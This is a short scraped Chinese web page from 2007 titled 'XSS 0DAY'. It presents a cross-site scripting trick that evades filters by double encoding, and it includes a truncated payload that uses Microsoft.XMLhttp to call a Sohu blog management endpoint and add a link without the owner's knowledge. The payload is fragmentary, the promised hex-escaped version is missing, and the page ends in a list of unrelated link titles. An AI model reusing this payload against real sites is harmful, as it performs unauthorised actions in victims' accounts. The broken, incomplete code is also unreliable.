XSS 0DAY

来源:百度文库 编辑:神马文学网 时间:2024/04/27 23:41:21
 XSS 0DAY   [ 日期:2007-01-06 ]   [ 来自:本站原创 ]

其实很简单,就是两次转码.
Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html

写成下面16进制转义字符串



此方法也可用于其他样式表属性. 

XSS 0DAY XSS 0DAY 瑞星0day漏洞 XSS攻击 MatrixPedia: XSS XSS攻击 什么是0day,如何下载0day软件? The blue day (0 ) 0Day(ZeroDayAttack)学习笔记 0day漏洞平均“寿命”384天 Internet Explorer 0day漏洞可能会愈演愈烈 A Day in the Life of Web2.0 微软证实黑客针对IE的0day漏洞属实\ 微软紧急0day补丁 KILL提醒及时修补 0day漏洞作恶 "假面"木马化身快捷方式 微软曝快捷方式0day漏洞 “双子”木马借机传播 Blog Day day trading 搞笑day thanksgiving day thanksgiving day XSS (Cross Site Scripting) Cheat Sheet Automatic Generation of XSS and SQL Injection... XSS攻击测试语句大全s